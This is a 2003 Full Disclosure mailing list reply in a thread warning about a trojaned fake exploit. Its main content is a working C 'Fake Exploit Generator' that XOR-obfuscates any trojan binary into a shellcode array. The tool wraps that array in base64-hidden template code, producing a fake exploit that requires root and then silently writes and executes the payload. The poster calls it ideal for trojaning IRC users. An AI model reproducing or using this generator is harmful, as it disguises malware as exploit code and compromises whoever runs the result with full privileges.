Full Disclosure mailing list archives
Re: Re: -1 day exploit - Warning
From: gml <gml () phrick net>
Date: Fri, 13 Jun 2003 22:39:03 -0400
On Friday 13 June 2003 06:51 pm, David Bernick wrote:
Well anyway, I got inspired:
// Fake Exploit Generator
// gml () phrick net
//
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#define badchar(c,p) (!(p = memchr(b64string, c, 64)))
#define BEAUTIFY "indent"
char b64string[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static char header[] = {
"Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr"
"Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1"
"ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K"
};
static char body[] = {
"dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK"
"CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g"
"bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy"
"KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0"
"KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK"
"CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w"
"ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs"
"Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3"
"cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw"
"NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu"
"dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo"
"KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K"
};
long b64dec (char *to, char *from, unsigned int len)
{
char *fromp = from;
char *top = to;
char *p;
unsigned char cbyte;
unsigned char obyte;
int padding = 0;
for (; len >= 4; len -= 4) {
if ((cbyte = *fromp++) == '=') cbyte = 0;
else {
if (badchar(cbyte, p)) return -1;
cbyte = (p - b64string);
}
obyte = cbyte << 2; /* 1111 1100 */
if ((cbyte = *fromp++) == '=') cbyte = 0;
else {
if (badchar(cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte >> 4; /* 0000 0011 */
*top++ = obyte;
obyte = cbyte << 4; /* 1111 0000 */
if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; }
else {
padding = 0;
if (badchar (cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte >> 2; /* 0000 1111 */
*top++ = obyte;
obyte = cbyte << 6; /* 1100 0000 */
if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; }
else {
padding = 0;
if (badchar (cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte; /* 0011 1111 */
*top++ = obyte;
}
*top = 0;
if (len) return -1;
return (top - to) - padding;
}
void printhex(char c, FILE *fp)
{
char s[10];
if(c < 16 && c >= 0)
{
fprintf(fp, "\\x%2.2x", c);
}
else
{
if(c > 0)
{
fprintf(fp, "\\x%2.2x", c);
}
else
{
sprintf(s, "%x", c);
fprintf(fp, "\\x%c", s[6]);
fprintf(fp, "%c", s[7]);
}
}
}
int main(int argc, char *argv[])
{
FILE *trojan;
FILE *fakeexp;
char byte[0];
int count = 0;
char *out;
out = (char *)malloc(sizeof(body));
memset(out, 0, sizeof(out));
#ifdef BEAUTIFY
char *cmd;
#endif
if(argc < 4 )
{
printf("usage: %s trojan fakeexp.c key\n", argv[0]);
printf("ex: %s trojan fakeexp.c 187\n", argv[0]);
exit(0);
}
trojan = fopen(argv[1], "r");
fakeexp = fopen(argv[2], "w");
if(trojan && fakeexp)
{
b64dec(out, header, sizeof(header));
fprintf(fakeexp, "%s", out);
memset(out, 0, sizeof(out));
fprintf(fakeexp, "\n#define MAX\t%s\n\n", argv[3]);
fprintf(fakeexp, "static char shellcode[] = {\n");
while(!feof(trojan))
{
memset(byte, 0, sizeof(byte));
fread(byte, 1, 1, trojan);
byte[0] = byte[0] ^ atoi(argv[3]); // obfuscate
if(count < 15)
{
if(count == 0)
{
fprintf(fakeexp, "\"");
}
printhex(byte[0], fakeexp);
count++;
}
else
{
printhex(byte[0], fakeexp);
fprintf(fakeexp, "\"\n");
count = 0;
}
}
fprintf(fakeexp, "\"\n};\n\n");
b64dec(out, body, sizeof(body));
fprintf(fakeexp, "%s", out);
memset(out, 0, sizeof(out));
fclose(trojan);
fclose(fakeexp);
}
#ifdef BEAUTIFY
cmd = (char *)malloc(sizeof(BEAUTIFY) * sizeof(argv[2]) + 2);
memset(cmd, 0, sizeof(cmd));
sprintf(cmd, "%s %s", BEAUTIFY, argv[2]);
system(cmd);
free(cmd);
#endif
}
Wow, I'd never run something that had a printf statement in it with print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n"; if you run this you deserve to get owned. this guy could have at least xor'd the strings and base64 encoded them or SOMETHING.the printf statement is in the shellcode. if you don't know C and/or hex very well it looks semi-legit. The attached perl code is the decoded shell code, it's not in the actual "exploit". This is the perfect kind of program to trojan little hacker wannabes on IRC. and no one deserves to be owned. They just need to pay for highly paid security consultants instead (shhh..kidding). d _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- -1 day exploit - Warning Brian Houk (Jun 13)
- Re: -1 day exploit - Warning Brian Houk (Jun 13)
- Re: Re: -1 day exploit - Warning gml (Jun 13)
- Re: Re: -1 day exploit - Warning David Bernick (Jun 13)
- Re: Re: -1 day exploit - Warning gml (Jun 13)
- Re: Re: -1 day exploit - Warning gml (Jun 13)
- Re: -1 day exploit - Warning Brian Houk (Jun 13)
- Re: -1 day exploit - Warning Stephen Amadei (Jun 13)
- Re: -1 day exploit - Warning Brian Houk (Jun 13)